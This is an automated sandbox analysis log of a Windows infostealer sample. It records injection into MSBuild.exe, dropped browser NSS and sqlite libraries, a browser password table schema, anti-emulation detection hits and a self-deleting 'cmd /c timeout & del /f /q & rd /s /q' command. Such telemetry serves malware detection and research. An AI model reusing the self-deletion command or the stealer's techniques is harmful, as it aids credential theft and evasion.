                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6E6E01_2_6CC6E6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF46D01_2_6CBF46D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2C6501_2_6CC2C650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFA7D01_2_6CBFA7D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC507001_2_6CC50700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE00B01_2_6CBE00B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC80901_2_6CBC8090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAC0B01_2_6CCAC0B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1E0701_2_6CC1E070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9C0001_2_6CC9C000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC980101_2_6CC98010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD01E01_2_6CBD01E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC381401_2_6CC38140
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: String function: 6D069B35 appears 141 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: String function: 6D06D520 appears 31 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: String function: 6D0690D8 appears 51 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CBF9B10 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CD5DAE0 appears 46 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CD5D930 appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CBF3620 appears 51 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004024D7 appears 312 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004180A8 appears 104 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CD509D0 appears 196 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Static PE information: invalid certificate
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000045CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.0000000005798000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624610288.0000000000A1E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameportableneweurope_hub8.exeP. vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePolly.dll, vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZipExtractor.dll: vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1768840583.0000000005BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1768881282.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1762735635.000000000100B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenamePolly.dll, vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenameZipExtractor.dll: vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenameportableneweurope_hub8.exeP. vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.990d4c.3.raw.unpack, InflaterInputBuffer.cs Cryptographic APIs: 'TransformBlock'
                    Source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.990d4c.3.raw.unpack, DeflaterOutputStream.cs Cryptographic APIs: 'TransformBlock'
                    Source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.990d4c.3.raw.unpack, ZipAESTransform.cs Cryptographic APIs: 'TransformBlock'
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/32@1/2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.log
                    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6580
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Mutant created: NULL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: sqls[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: HDAAAA.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe ReversingLabs: Detection: 34%
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Virustotal: Detection: 38%
                    Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exit
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic file information: File size 5039032 > 1048576
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x47ae00
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004440000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.0000000005610000.00000004.08000000.00040000.00000000.sdmp, Protect544cd51a.dll.0.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdbfffGCTL source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: System.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.pdbD source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdbjz source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA256 source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb< source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2054205361.00000000192D8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.00000000056CA000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: 0xA24C332C [Fri Apr 14 01:53:48 2056 UTC]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D01B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6D01B6C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06CC2B push ecx; ret 0_2_6D06CC3E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06D565 push ecx; ret 0_2_6D06D578
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EBA828 push eax; mov dword ptr [esp], ecx0_2_02EBA829
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EB46CC push esi; iretd 0_2_02EB46CD
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_054383EF push dword ptr [esp+ecx*2-75h]; ret 0_2_054383F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004191D5 push ecx; ret 1_2_004191E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\mozglue.dllJump to dropped file
